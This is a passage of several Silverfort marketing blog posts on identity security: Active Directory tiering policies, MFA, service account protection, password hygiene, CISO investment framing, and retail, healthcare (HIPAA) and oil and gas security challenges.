across Tiers After awareness training with IT admins who crossed Tier barriers with their Tier 0 or Tier 1 accounts (for example discovered using the NOTIFY policies proposed in the AD Tiering blog article on visibility), it can be a good time to switch those policies from NOTIFY to DENY action, to block inappropriate account usage across tiers, and get real-time alerts as well as daily reports on any attempts thereof.   Figure 1 - Example policy in Silverfort to block authentications with Tier 1 accounts on Tier 2 assets Protect Privileged User Accounts With Appropriate MFA Access with privileged accounts in any Tier can be protected with appropriate MFA methods. For example, remote administration of « Application X in PROD » by Tier 1 application administrators for this perimeter can be protected with FIDO2 and/or Silverfort mobile Push MFA if there are no dedicated third-party MFA available for the Tier 1 accounts.   Figure 2 - Policy to protect access with Tier 1 admin accounts using appropriate MFA methods.   Secure Console Access on Domain Controllers  If access to domain controllers on the console is possible (e. g. through the hypervisor) and not adequately protected, the Silverfort for Windows Logon policy can help protect the console access.   Figure 3 - Policy to protect access to the domain controller console with MFA  Enforce Usage of Tier-Specific Admin Solutions To force administration from a dedicated admin jump server or PAM solution in T1, RDP and Remote PowerShell authentication can be denied from any other origin using a DENY policy.   Figure 4 – Authentication policy to prevent bypass of the admin station (administrative jump hosts, PAM, PAW, VDI or otherwise) in place to manage specific assets in Tier 1.   Stop Lateral Movement by User Accounts Within a Tier To limit lateral movement / implement least privileges within Tier 1, remote administration of a group of servers « Application X in PROD » can be limited to the group(s) of administrators for the application servers using a DENY policy.   Figure 5 - Example policy to stop lateral movement by implementing least privilege for remote management of Application X servers in PROD.   Stop Lateral Movement by Service Accounts Within a Tier To limit lateral movement / implement least privileges within Tier 1, service accounts can be « ring fenced » to only provide access to the perimeter where they should operate.   Figure 6 – An example ring-fence policy for a privileged service account to prevent lateral movement.   Silverfort Protection Policies Help Extend AD Tiering Beyond Tier 0  The combination of Silverfort Authentication Firewall, MFA policies and ring-fencing policies service account provide an elegant and effective approach to accelerate deployment of Active Directory Tiering beyond Tier 0  Silverfort can help protect accounts of any Active Directory tier with an MFA method most appropriate for the task.  The Silverfort authentication firewall allows detection and prevention of any cross-tier access by privileged accounts to prevent privilege escalation attacks, as well as limiting horizontal access within a tier to prevent lateral movement, using central enforcement while avoiding the typical complexities associated with existing methods. Both human and service accounts can be secured, blocking unauthorized access to stop lateral movement and prevent privilege escalation by an adversary.  Using the security controls provided by Silverfort can accelerate implementation of an Active Directory tiering project, or can help getting the project back on track if it’s stalled at the end of covering Tier 0.  Looking to strengthen your AD Tiering management and gain complete visibility across your environment? Reach out to one of our experts here.   --- - Published: 2024-07-09 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/ad-tiering-made-simpler/ Active Directory (AD) tiering is nothing new for organizations that need the most secure IT environments, like those in the defense and critical infrastructure spaces. While it is a surprisingly underused approach to partitioning and protecting an organization’s most valuable assets and accounts, it is starting to find its way into more businesses as an effective method to stop privilege escalation attacks in AD. AD tiering projects frequently go hand in hand with implementing the principle of least privilege to stop lateral movement within a tier. Additionally, they’re often accompanied by the implementation of visibility tooling to provide insights on privileged account and legacy authentication protocol usage, both of which are key to a successful AD security tiering project. In this blog, we'll explore the visibility challenges associated with Active Directory (AD) tiering and discuss how Silverfort visibility capabilities help organizations overcome these challenges, making the management of AD tiering simpler and more efficient. Common Visibility Challenges in AD Tiering Figure 1 - typical distribution of admin and privileged service accounts in an Active Directory tiering model Organizations typically start an AD tiering project by locking down human account access to Tier 0, which includes Domain Controllers, PKI online signing CA, Entra Connect / AD FS. They do this by using Privilege Access Workstations and logon restrictions with group policies and/or authentication policy silos. However, organizations often struggle to extend this approach beyond Tier 0, crucially leaving Tier 1 – where typically 98% of all admin accounts and privileged service accounts reside (see Figure 1) – without full coverage. Here are the main challenges that most organizations experience with AD tiering: Limited Visibility of Privileged Service Accounts A large portion of service accounts have been in use for a long time and are often overprivileged. In addition, their credentials may be stored unencrypted in the local filesystem, and it can be very challenging to understand exactly where and when they are used. Insufficient visibility of account mapping It is essential to consider what resources are accessed by each privileged user when designing a model of least privileged access. These results then need to be validated and sanitized before implementing them as access rules. Lack of visibility of legacy protocol usage Ideally, all privileged users should be members of the "Protected Users" group, which disables password caching and legacy protocols. Prior to enabling this group membership, it is necessary to obtain complete visibility into the usage of legacy authentication protocols by these privileged users in order to measure the potential impact and implement remediation measures. For the above reasons, organizations that have started their AD Tiering model journey typically manage to secure Tier 0 for their admin user accounts but get stuck trying to extend it to Tier 1. How Silverfort Helps with AD Tiering Silverfort can enhance AD tiering by offering extensive visibility and control over user access across the organization. It continuously monitors authentication and access activities, assigning risk indicators and scores to users and machines based on their behavior patterns. This process helps identify and manage access to high-risk or high-value assets, which is crucial for AD tiering. Additionally, Silverfort's integration with Azure AD provides further insights into user behavior and risk, supporting the implementation of an effective AD tiering strategy. Complete Visibility Across AD Environment Once deployed, Silverfort will get real-time visibility into domain-based authentications and collect the metadata for every authentication. Silverfort also offers the ability to scan for attack surfaces and misconfigurations and provides other metrics relevant to the security and health of your Active Directory deployment. Most of these metrics are presented as KPIs in dashboards, live alerts that can be acted upon, or high-level reports that can be used to provide management with an overview of Active Directory risk. Here are some examples of Silverfort capabilities relevant for visibility on AD Tiering: Detection of Privileged Accounts To detect/monitor the user scope for Tier 0, Silverfort can quickly provide an inventory of all relevant accounts using our risk indicators “Domain Administrators”, “Privileged Users” and “Shadow admins”. Figure 2 - Inventory of privileged accounts with dedicated KPIs in Tier 0: Domain Admins, Privileged Users, and Shadow Admins. Clicking any of the relevant KPIs will provide a detailed list of flagged accounts, including a short description of the risk, how to mitigate it, and a link to the relevant article in the Mitre ATT&CK framework. Figure 3 - List of shadow admin accounts Detection of Service Accounts Visibility into the usage of Active Directory service accounts is often lacking. Silverfort makes it very easy to quickly get an overview of all service account usage, as well as relevant KPIs such as privileged service accounts, interactive logon (dual use), and risk level based on the attack surface and any observed attacks or unusual behavior. Figure 4 - Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info Investigate Service Account Activities For each Active Directory account of interest, Silverfort’s investigation page provides detailed KPIs providing information where the account is used (Sources), as well as any authentications to destination network services (Targets). This information is essential for defining the scope to implement least privilege using policies. Figure 5 – KPIs for a deep-dive investigation of each account, including all sources and destinations of authentications Advanced Authentication Logs Silverfort’s authentication log with built-in parsers for weak encryption protocols allows for quick identification of authentications that should not be used by privileged users. With this information, legacy authentications can be eliminated or reduced to an absolute minimum. Privileged accounts can also be added to the “Protected Users” group in Active Directory, with good visibility on the possible impact of this action. Figure 6 - Example log parser showing results for simple LDAP binds by a domain administrator account, as well as risk indicators available for filtering usage of weak encryption types Identity Security & Posture Management The Threat Detection dashboard in Silverfort gives an overview of Active Directory attack surface management, using KPIs for common misconfigurations and other steps that should be taken to reduce the attack surface. Commonly detected issues should be addressed, especially when they concern privileged accounts or resources in Tier 0 or Tier 1. Figure 7 - Selection of KPIs for AD attack surface management Notification Access Policies Once asset and account tiers have been established and organized using dedicated OUs or AD groups, it’s easy to create authentication policies to get real-time alerts of inappropriate account usage across tiers and daily reports on their occurrence. Figure 9 - Example notify access policy for interactive logon across tiers with Tier 1 accounts Real-Time Visibility is Essential for Effective AD Tiering Management Innovations by Silverfort around the visibility of Active Directory authentication allow for a simple yet very effective approach to accelerate the deployment of Active Directory Tiering. With relatively little effort for deployment and configuration, organizations can gain insights into account usage, attack surface, and compliance with tiering policies, as well as user/service account and computer/resource risk. While there’s no magical solution to rolling out tiering across all Active Directory assets in an organization, Silverfort makes the task significantly easier. Read our next blog in the AD tiering series, where we highlight the specific protection challenges associated with AD tiering and how Silverfort's enforcement capabilities can effectively address these challenges and strengthen your AD environment. --- - Published: 2024-07-04 - Modified: 2024-10-07 - URL: https://www.silverfort.com/blog/beyond-passwords-why-trusting-password-hygiene-isnt-enough/ Let's discuss passwords and identity security. By entering a password that only you know, you are in theory "proving" to a system that you are who you claim to be. They have been widely used in the IT/OT world for a very long time – arguably too long. To make passwords a little more secure, some organizations have a policy regarding the complexity and frequency of password changes. This is why there are solutions that focus on detecting password hygiene issues or similar alerts.   What Are the Different Password Hygiene Issues?   Password hygiene refers to the practice of creating, managing and protecting passwords. It consists of guidelines and best practices designed to reduce the risk of unauthorized access or compromised credentials. The following are some common password hygiene issues:  Weak Passwords: The use of simple, easily guessable passwords; for example, "123456" or "password". These passwords are easy to crack as they are short and lack the complexity of mixing letters, numbers, and special characters. Duplicate or shared passwords: Using the same password across multiple systems/accounts increases the risk if one system/account is compromised.   Old passwords: Not regularly updating passwords might allow an attacker enough time to guess the password, or lead to prolonged exposure if a password is compromised.    Is Detecting Bad Password Hygiene the Right Approach?   Both yes and no. In theory, alerts are a good thing, but organizations should not solely focus on detection and reacting to alerts. Having more alerts to review every day is not always valuable, and retrospective detection alone could be too little too late, as the attacker might have already taken advantage of them. Additionally, even with great password hygiene, malicious actors can still obtain credentials without your knowledge. Even a strong password that has not been shared nor found on the dark web could be compromised through phishing or tools like Mimikatz. Assume passwords will be compromised and take a different approach to protecting identities – one that prioritizes protection. The key is to ensure that even if an attacker has obtained valid credentials, they won’t be able to use them for malicious activity like performing lateral movement. In short, don’t just focus on detection – focus on protection.   Protection is Better Your identity security strategy should be built around focusing on the protection of your identities, rather than simply adding more alerts.   For human accounts, this could be strong MFA and conditional access controls, even for interfaces that were considered “unprotected” like CLI tools or file shares. So even if an attacker attempts to use compromised credentials with these interfaces, they will face another layer of security. Don't forget about Non-Human Identities (NHI)   NHI and Active Directory service accounts must also be protected. Their activity is usually automated and based on machine-to-machine communication. It is common for non-human identities to have elevated privileges or even administrative access depending on each vendor’s requirements. At scale, this could be a lot. Compromised service accounts can be used to perform a variety of malicious activities, such as running lateral movement for the purpose of deploying ransomware.   Some organizations are trying different ways to secure service accounts, their passwords, and their activity in the network. Even so, an attacker could gain service account credentials using other methods or tools.   How Can You Protect Service Accounts? Organizations should implement proactive protection methods based on security controls tailored for service accounts at scale.   When choosing a solution for service account management and protection, the following features should be considered: Full visibility - You should be able to map all your service accounts based on their actual behavior on the network. This will allow admins to automatically identify them – even those you didn’t know existed – and provide complete visibility into their behavior patterns. Behavior analysis- You should be able to analyze their dependencies and their repetitive authentication activities within the domain, as well as synchronize with your CMDB to enrich knowledge. Proactive protection- Most importantly you should be able to create policies to place a "virtual fence" around your service accounts at scale, so even a compromised service account won't be able to move laterally within the network. It’s important to only allow it to do what it is supposed to do for its functionality. For example, a database service account should only be used to authenticate to the DB app servers. From Detection to Protection: Enhancing Identity Security  An identity security strategy with protection as the primary focus is the recommended approach to ensure the security of your users and service accounts against malicious actors.  Implementing strong MFA (such as number-matching or phishing-resistant methods like FIDO2) for human accounts to access even traditionally "unprotectable" interfaces will significantly enhance security. For service accounts, virtual fencing techniques offer robust protection at scale by tightly controlling and monitoring machine-to-machine activities.   The bottom line is that you should focus more on protective security controls and not solely on retrospective detection alerts. To learn how Silverfort can help you focus on protection and meet your identity security needs, request a demo here: https://www. silverfort. com/request-a-demo/  --- - Published: 2024-06-27 - Modified: 2024-10-02 - URL: https://www.silverfort.com/blog/treating-identity-security-as-a-business-investment/ Security decisions directly affect employees, customers, shareholders, and business continuity. As the role of the Chief Information Security Officer (CISO) evolves from tech leader to business leader, they must increasingly bridge the gap between business objectives and security risks, and translate security into measurable outcomes. In this article, we will examine this issue from the perspective of identity security. The CISO Paradox: Sometimes Cybersecurity is More Business than Cybersecurity As with any business decision, cybersecurity is a matter of risk management: the potential risk reduction you get from investing in cybersecurity vs. the costs entailed in making these investments. Similar to allocating resources to any other organizational need, investing in cybersecurity goes beyond purchasing the right tools. It impacts business continuity, employees, customers, shareholders, and many others. Problem is, business leaders do not typically view cybersecurity as a business decision, largely because the role of the CISO has evolved, and organizations are still adjusting. CISOs are now more business leaders than tech leaders, but this concept has not yet been fully understood and implemented. This creates a complex task for the CISO. Their information security architects speak in terms of solutions, while their executives speak in terms of business outcomes. Balancing these two and translating one to the other requires great effort and greater authority. To make a calculated business decision, it is helpful to apply the following formula: Cybersecurity ROI = /(investment cost) Current Risk: Assessment of the organization's attack surface, financial losses in the event of a breach, impact of downtime on each division, likelihood of being breached, published statistics on the cost of a breach, etc. Expected Reduced Risk: Estimate of the risk following the implementation of the suggested security plan, including reducing the attack surface, decrease in insurance premiums, etc. Investment Cost: The total cost of implementing the suggested security plan, including the purchase of tools and training. Price is What You Pay, Value is What You Get: What is The Real Cost of Identity Security? So how does the equation above translate identity security into a business-driven decision? According to The State of the Identity Attack Surface report, 83% of organizations have experienced a security breach that involved compromised credentials. The vast majority of ransomware attacks rely on lateral movement to spread throughout a network. Typically, the initial point of entry is through a compromised regular user account or service account. Let's explore the cost of protecting these key parts of the identity attack surface in more detail. We will begin by discussing MFA as an example, and then we will discuss service accounts as well. MFA... but at what cost? In the case of MFA, organizations may have the following two options: Only enforcing MFA for admins: less expensive than MFA for all users but does not prevent lateral movement that involves regular users. Enforcing MFA for all users: more expensive but provides protection against lateral movement that involves regular users. In each case, the current risk is the same. The CISO can illustrate the outcomes of each option by putting actual numbers into the equation and start a business-driven discussion: MFA for Admins = /(lower investment cost) MFA for All Users = /(higher investment cost) The decision could be either option, as long as it is communicated to executives and the board and demonstrated through measurable outcomes. Service Accounts: What's the cost of being invisible? With service accounts, it is easier to translate risk into visibility: Purchase of a service account security solution: enables the discovery, monitoring, and control of all service accounts. It can provide full visibility, but may be costly. Do it manually, at least partially: it is difficult to keep track of all service accounts. While it is somewhat achievable in smaller organizations, it is an almost impossible task for larger organizations. Costs vary, but are usually much less expensive than investing in a security solution. Do nothing at all: visibility remains the same, current risk remains the same. The number of organizations with full visibility into their service accounts is only 5. 7%. Yet many high-profile data breaches in recent years involved the use and compromise of these non-human identities, including SolarWinds, the US Office of Personnel Management, and Marriott. Organizations should review their history to see if past incidents have occurred, service accounts have been misused or compromised, and how ransomware attacks have affected other organizations in their industry. There are advantages and disadvantages to each option, and no one option is suitable for all organizations. Illustrating the outcomes: Service Account Security Tool = /(higher investment cost) Manual Detection = /(lower investment cost) Doing Nothing = /(no investment cost) Final Thoughts: Bridging the Gap CISOs are becoming a key role in translating security solutions into business decisions. But with great power comes great responsibility, as measurable security outcomes not only facilitate a better understanding of the discussion, but are also crucial to making the right choices. What are the right choices? As shown above, there is no single answer to this question. The key is to treat cybersecurity like any other business investment: cautiously, armed with all the facts, and based on actual numbers. --- - Published: 2024-06-18 - Modified: 2025-05-07 - URL: https://www.silverfort.com/blog/navigating-retail-overcoming-the-top-identity-security-challenges/ As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But brand recognition is a double-edged sword when it comes to cybersecurity. The bigger your name, the bigger the cyber target on your back. Data breaches in the retail sector cost an average of $3. 28 million in 2023, with 50% of cyberattack victims experiencing extortion and 25% experiencing credential harvesting.   The nature of retail organizations differs from most industries in that they are multi-site and multi-channel, resulting in many more entry points for ransomware attacks. The threat of ransomware is one of the greatest concerns for retailers. In this post, we will highlight the key identity security challenges retailers face and illustrate how Silverfort can assist identity and security teams to fully address these challenges and secure their environments. Retail Threat Attack Landscape The retail attack landscape is increasingly riddled with challenges, with compromised credentials emerging as a primary vector for cyberattacks. In 2023, the retail sector saw an increase in cyber incidents, with compromised credentials accounting for nearly 40% of these breaches. Attackers exploit stolen or weak credentials to gain unauthorized access to systems, often leveraging them to infiltrate networks and exfiltrate sensitive data. This threat is compounded by the industry's heavy reliance on customer-facing operations and digital transactions, making it a lucrative target for cybercriminals. Identity threats, such as credential stuffing, are particularly concerning, as they can lead to unauthorized access to customer information and financial data. The retail industry must contend with the dual challenge of securing vast amounts of sensitive data while maintaining seamless operations, especially during peak business periods. In retail, employees’ threat awareness is generally considered a weak link or the low-hanging fruit for malicious actors to target and open the door to move laterally across a retailer's environment. The Evolving Role of Lateral Movement in Retail Ransomware Attacks Ransomware is one of the greatest concerns for retailers, and as the recent number of attacks on this sector illustrates, it affects the entire sector. The nature of retail organizations differs from most industries in that they are multi-site and multi-channel, resulting in many more entry points for ransomware attacks. Typical retail operations include item-level RFID-based packages and pallets, vehicle-mounted computers, handheld scan-based computers, smart shelves and more, resulting in a massive attack surface to protect. Consequently, retailers are struggling to prevent lateral movement attacks aimed at deploying ransomware. The ability to move laterally within a network plays a particularly crucial role in ransomware attacks, as it allows malicious actors to infiltrate a target's environment. After gaining initial access, attackers use techniques such as credential dumping, pass-the-hash, and exploiting Remote Desktop Protocol (RDP) to navigate through the network until they reach their targeted privileged users. This allows the attackers to escalate privileges, identify critical assets like customer databases and point-of-sale systems, and deploy ransomware broadly. For retail organizations, lateral movement means that an attack on one part of the network can quickly compromise other systems, leading to widespread operational disruption and significant financial and reputational damage. The Security Challenges that Retailers are Facing  Identifying and addressing the different identity security challenges facing retailers should be a top priority for all retail organizations. The following are the three most pressing challenges facing most retailers when it comes to identity security: Lack of Visibility Across Complex Environments Due to the nature of retail environments, the lack of visibility poses a significant security challenge. Without comprehensive visibility across environments, retailers struggle to have the ability to monitor and protect all user access activity and authentication to their applications (including CRM, ERP, SUSE systems, and more) and servers which creates a major security gap. Retailers use a variety of devices and applications that interact on a daily basis, ranging from point-of-sale systems to online customer portals. As these systems are operated independently, it is difficult for security teams to monitor and manage the entire identity lifecycle. As a result, unauthorized access and potential breaches are more likely to occur, as there is no centralized view that allows for real-time detection and prevention of malicious activity. This lack of visibility into retail resources and users increases the risk of unauthorized access, identity theft, and other malicious activities. This can lead to security risks such as lateral movement and ransomware attacks that result from undetected unauthorized access. Inability to Stop Lateral Movement Attacks in Real Time Ransomware attacks fueled by lateral movement have become an operational risk for practically every retail organization. Lateral movement attacks are effectively a blind spot in today’s security stack, which cannot detect and prevent them in real time. Lateral movement attacks are carried out by providing valid but compromised user credentials to log in to resources (servers, workstations, apps, etc. ) in the target environment. A threat actor's objective is to leverage the compromised users of the 'patient zero' machine to move within the targeted environment until they can execute the ransomware payload simultaneously on a large number of machines. This poses a significant detection challenge because authentications performed by an attacker are essentially identical to those performed by a legitimate user. The authentication process in both cases involves the passing of credentials to an identity provider, which validates them and grants or denies access in accordance with the validation. As such, a lateral movement attack is at its core a series of authentications that utilize the legitimate authentication infrastructure for malicious purposes.  Limited Visibility & Protection of Service Accounts Service accounts have become a pressing concern for security and identity stakeholders across the retail industry as the attack surface landscape evolves rapidly. Service accounts are machine-to-machine accounts that are often deployed without proper documentation and are difficult to detect by identity management systems. Further complicating matters, malicious actors increasingly use them for lateral movement, particularly in ransomware attacks. Due to the difficulty of detecting these accounts, retailers lack complete visibility and security controls to protect service accounts. This makes it difficult to detect unauthorized access or malicious activity resulting from them. The activities and purposes of service accounts can also be difficult to identify if they are not associated with a specific user. As a result, retailers are susceptible to security risks, such as not detecting unauthorized access by threat actors that could result in lateral movement attacks. Since service accounts lack visibility and are not subject to identity security measures such as Multi-Factor Authentication (MFA), they pose a critical identity protection challenge for retailers. How Silverfort Solves Retail Identity Security Challenges Silverfort integrates with all Identity Providers (IdP) in retailer hybrid environments to perform continuous monitoring, risk analysis, and adaptive access policies on all access attempts, made by all users, to all manufacturing resources. With Silverfort, access to resources is never granted solely based on credentials. Silverfort's risk analysis determines whether to permit access, augment authentication with MFA verification, or block access entirely. Silverfort offers a robust identity security platform that helps retailers overcome all the challenges we’ve described in the previous section: Lateral Movement Protection Silverfort is the first solution that can extend MFA verification to all access interfaces and authentication protocols in the AD environment, including command-line access tools like PsExec and PowerShell which tend to be used by ransomware actors for lateral movement. With this protection in place, even if user credentials are compromised, the attacker cannot use them for malicious access. Full Context Across Environments Silverfort automatically discovers and protects all user accounts in a hybrid environment from identity-based threats and provides centralized visibility into every authentication and access request. As a result of Silverfort’s native integrations with all identity providers, including Active Directory, it can log every authentication request. This provides a unified view of all network activity across every user and any resource in the hybrid environment. Full Visibility and Protection of Service Accounts Silverfort automatically identifies all service accounts within the environment and enables identity and security teams to secure them with premade policies, tailored to each account’s behavior. With continuous monitoring of all authentication and access activities of service accounts, Silverfort can assess the risk associated with every authentication attempt and detect any suspicious behavior or anomalies. To learn more about how Silverfort can help you with your identity security challenges, request a demo here. --- - Published: 2024-06-04 - Modified: 2024-06-04 - URL: https://www.silverfort.com/blog/unlocking-hipaa-compliance-navigating-access-control-and-mfa-guidelines/ As technology continues to revolutionize healthcare operations, protecting patient data has never been more challenging. In the ongoing struggle against data breaches, last year marked a tipping point, as an unprecedented 133 million healthcare records were breached, according to the HIPAA Journal. In this blog, we will delve into the HIPAA compliance framework, with a particular focus on the sections around access control and MFA and how adding identity security controls across your organization can help you comply with HIPAA. What is the HIPAA Act HIPAA, the Health Insurance Portability and Accountability Act, is a crucial piece of legislation enacted in 1996 in the United States. Its primary objective is to safeguard individuals' medical information, ensuring the privacy and security of their health data. HIPAA's relevance to healthcare providers cannot be overstated, as it mandates strict guidelines for handling sensitive patient information. One of the core aspects of HIPAA compliance is the protection of electronic protected health information (ePHI). ePHI includes any electronic health information that identifies an individual and is transmitted or maintained by a covered entity or business associate. This encompasses a wide range of data, from medical records and billing information to patient demographics and lab results. Securing and protecting these sensitive patient data and records against malicious actors is critical. Access control and multi-factor authentication (MFA) are crucial elements in preventing unauthorized access to ePHI and achieving HIPAA compliance. Let's dive into the specifics. Access Control Requirements According to HIPAA's Security Rule, which states "HIPAA-covered entities must implement the appropriate administrative, physical, and technical safeguards to ensure the confidentiality, integrity, and security of electronic protected health information (ePHI)," organizations are required to implement technical safeguards to protect ePHI. These technical security approaches must include an access control system to ensure only authorized individuals can access ePHI. HIPAA requires organizations to implement the following access control measures: Policies and procedures for electronic information systems that maintain ePHI to allow access only to authorized users, programs, processes, or other systems. Admin controls involve establishing policies, procedures and guidelines for managing user access. Technical controls utilize solutions such as authentication systems, encryption, and access logs to control electronic access. Physical controls restrict physical access to facilities and equipment where ePHI is stored or processed. Role-based access control (RBAC) is a common approach used to manage access to ePHI within healthcare organizations. RBAC assigns permissions based on users' roles and responsibilities, ensuring individuals only have access to the information necessary to perform their job functions. Enforcing Access Controls in HIPAA In accordance with the Security Rule, organizations must develop written policies and procedures for granting access to ePHI. Policies and procedures must also specify who has access to what information and how these access points will be tracked and monitored. To comply with the Security Rule, organizations must enforce: Processes to grant and deny access to ePHI. Access must be granted only to individuals with a business reason to use the ePHI. Ability to revoke access when no longer needed. Regularly monitoring to ensure access is granted and withdrawn in a timely manner. In addition, organizations must be able to protect ePHI in the event of a security breach by, for example, encrypting personal information during storage and transmission and implementing an emergency access procedure. Lastly, in terms of access controls, organizations must maintain an audit trail that records who has accessed ePHI. This audit trail must contain information regarding when and by whom access was granted and revoked, as well as what data was accessed. Strong Authentication for HIPAA While the HIPAA Security Rule does not specifically mandate the use of MFA, HIPAA mandates the implementation of “reasonable and appropriate” security measures to protect patient data. MFA aligns perfectly with these requirements, providing robust access control and an additional layer of security that helps healthcare organizations meet HIPAA’s stringent security mandates. Here's how HIPAA addresses strong authentication and recommends MFA as a security best practice: Strong Authentication Requirement: HIPAA's Security Rule requires covered entities to implement procedures for verifying the identity of users seeking access to ePHI. This includes the use of authentication methods that are "reasonable and appropriate". Recommendation of MFA: MFA is a security best practice for enhancing authentication and access control. The Department of Health and Human Services (HHS), which enforces HIPAA, has issued guidance recommending the use of MFA as part of a comprehensive security program. Flexibility in Implementation: HIPAA allows covered entities to determine the most appropriate authentication measures based on their specific risk factors, organizational size, complexity, and capabilities. Even though MFA is not explicitly mandated, HIPAA offers organizations the flexibility to choose the authentication methods that best meet their security needs and risk profile; for example, passwords, biometrics, tokens, or MFA. Strengthening HIPAA Compliance with Silverfort Access Control System To answer HIPAA's access control requirements, Silverfort’s continuous authentication capabilities monitor and analyze user behavior in real time. Silverfort detects user behavior, devices, locations, and other risk factors to calculate the risk score of each user authentication request. If any unauthorized or abnormal behavior is identified, the system can take immediate action, such as terminating the session or requesting additional authentication. This means that access to ePHI can be tightly controlled, ensuring that only authorized individuals have access to sensitive data, which is a critical requirement of HIPAA. Silverfort’s authentication logs screen provides full visibility into all user logs, authentication activity, and risk indicators. Applying Access Policies With Silverfort, organizations can configure user access policies in compliance with HIPAA regulations. Access policies are configured based on users, groups, and organizational units (OUs), as well as the least privileges necessary for your systems, processes, and applications. By implementing these policies, organizations can gain full visibility into user accounts, access requests, and authentications, as well as create and monitor log files to detect malicious or irregular activities. The Silverfort policy screen displays all the access policies that have been configured and applied to your users For example, Silverfort's system can require MFA for each access request based on continuous analysis of user behavior, devices, locations, security events, and other risk factors. By doing so, access to ePHI can be properly managed and protected while ensuring that only authorized users will have access to sensitive patient information, as required under HIPAA. Enforcing MFA Protection To comply with HIPAA's requirement of strong authentication, Silverfort can enforce MFA protection across all users and resources, on-prem and in the cloud. This applies to all authentication to identity providers (IdPs) including Active Directory and those that couldn’t be protected by MFA before, such as legacy applications, command-line access, databases, networking infrastructure, and many others. Silverfort's strong authentication capabilities are achieved through access policies. Silverfort ensures no access is granted based on passwords alone, and users are required to authenticate through MFA to verify their identity. Silverfort's MFA access policy requires domain admins to authenticate their identity when requesting resource access The strong authentication via MFA protection aligns with HIPAA requirements, which mandate that only authorized individuals should have access to ePHI. By requiring MFA for each access request, Silverfort ensures that access to ePHI is strictly monitored with the proper security controls, as required by the HIPAA regulations. Want to learn more about how Silverfort can assist you in complying with HIPAA requirements? Schedule a call with one of our experts or fill out this form for a pricing quote. --- - Published: 2024-06-04 - Modified: 2025-03-11 - URL: https://www.silverfort.com/blog/identity-security-for-oil-and-gas/  Identity-based threats account for a staggering 80% of breaches, positioning identity security as the foundational element of cybersecurity in the oil and gas sector. As adversaries increasingly target identity security gaps, a resilient identity security framework is essential. It protects against unauthorized access, credential theft, and phishing attacks—providing robust identity security for all users from employees, contractors, devices, and critical systems.   Beyond Traditional IAM: A Deep Dive into Identity Security  While traditional Identity and Access Management (IAM) focuses primarily on access control, identity security goes further. It integrates advanced threat detection, privileged access security, and real-time monitoring to protect every facet of user access. For industries like oil and gas, identity security serves as the ultimate layer of defense against sophisticated cyber threats.   We examine why identity security is critical for all oil and gas organizations and address the sector’s-specific security challenges and outline best practices to strengthen your security posture.   A Snapshot of Identity Security in Oil and Gas  The oil and gas industry manages an intricate landscape of sensitive data, complex infrastructure, and critical energy resources, all essential to global operations. Yet, despite the sensitive data and resources, many within the industry perceive cybersecurity—especially identity security—as a nice to have. In fact, 52% of industry professionals believe their organizations fall short on cybersecurity investments. Failing to address this could expose firms to:  Physical infrastructure damage Operational disruptions Financial repercussions Environmental hazards Threats to safety systems and personnel The implications are profound, underscoring why identity security is essential to maintaining operational integrity and resilience against cyber threats.   Key Challenges in Oil and Gas   As the technology in oil and gas organizations continue to evolve, they continue face more advanced identity security challenges:  Legacy Systems: Legacy tools often don’t support modern security features, making them vulnerable to comprehensive attacks. Third-Party Access Risks: Contractors and vendors are essential but can introduce risks without stringent identity controls. Complex Supply Chains: Extended supply networks increase the risk of data breaches, underscoring the need for continuous monitoring and identity verification throughout the supply chain. Operational Technology (OT) Vulnerabilities: OT systems, such as SCADA, often operate without modern security measures, making them easy targets. Compliance Demands: Adherence to regulatory standards is critical to avoiding fines and breaches. Compliance with industry-specific requirements like NERC CIP, NIST and FERC is essential for long-term resilience. The Role of Emerging Technology in Identity Security  Technological advancements such as IoT, AI, and cloud solutions are transforming security for oil and gas organizations. Each provides unique capabilities that enhance identity security:  Cloud Computing: Centralizing identity management in the cloud streamlines access control, scales storage, and delivers real-time insights, enabling more proactive security decision-making. Artificial Intelligence (AI): AI-driven analytics detect anomalies in user behavior, automating responses and refining access control to ensure only verified users gain access. Internet of Things (IoT): IoT enhances remote identity management by validating devices and monitoring for threats, alerting administrators to risks and automating corrective actions. Best Practices for Integrating Identity Security Solutions  To optimize identity security, oil and gas organizations should integrate solutions in a way that supports operational demands and resilience. Key practices include:  Simplify Setup and Integration: Choose a solution that integrates smoothly with existing infrastructure and other security tools. Deployment should be efficient, easy, quick and scalable. User Access Controls: Detect and identify categorize user access requests and activity which helps define roles and assign permissions based on necessity. Regularly review and adjust permissions to maintain optimal security posture. Leverage Multi-Factor Authentication (MFA): Enforce MFA protections across all users and systems to protect against unauthorized access. Continuous Monitoring: Routine monitoring detects unusual behaviors and flags potential risks. Automated alerts and regular audits support compliance and reduce response times. Establish an Incident Response Plan: Have a proactive strategy for incident response, prioritizing key assets and updating tools based on post-incident insights. Core Components of an Effective Identity Security Program  A robust identity security strategy for oil and gas relies on several core components:  Identity Governance and Administration (IGA): Ensures authorized access, automated controls, and supports compliance by managing the entire user lifecycle. Privileged Access Security: Protects high-level access points and monitors privileged users in real-time, reducing risks associated with sensitive data access. Identity Threat Detection and Response (ITDR): ITDR provides real-time analytics to detect and mitigate threats, such as unusual access attempts, before escalation. User Behavior Analytics: Monitoring user activities for anomalies, like unauthorized logins or access requests, provides a proactive defense against breaches. Zero Trust: Zero Trust policies require all access attempts to be verified, limiting insider threats and ensuring that only authenticated users access critical resources. Embracing the Future of Identity Security in Oil and Gas  With the oil and gas market poised for further growth, projected to reach nearly $9 trillion by 2031, security must evolve in lockstep. Staying ahead requires ongoing monitoring, thorough audits, and regular updates to align with emerging threats and technologies. Industry players must:  Invest in scalable identity security solutions that can adapt as needs evolve. Conduct regular staff training to maintain awareness and preparedness. Proactively assess risks to strengthen security controls. Ensure continuous compliance with industry standards to mitigate cyber risks. Identity Security as the Foundation for Long-Term Success  In an industry with critical assets and complex infrastructures, oil and gas companies must consider identity security as non-negotiable. The need to deploy comprehensive solutions for protecting identities, preventing unauthorized access, and achieving regulatory compliance, all while optimizing operational efficiency. Embrace a forward-thinking approach with Silverfort’s unified identity security solutions, specifically designed to fortify your cybersecurity framework. Stay protected and request a demo with Silverfort to see how you can implement identity security across your entire environment.    --- - Published: 2024-06-04 - Modified: 2024-12-04 - URL: https://www.silverfort.com/blog/mfa-requirements/  Whether you are a bank, healthcare provider, or retail organization, safeguarding sensitive data is paramount. In spite of this, as cyberattacks evolve, securing critical resources and data 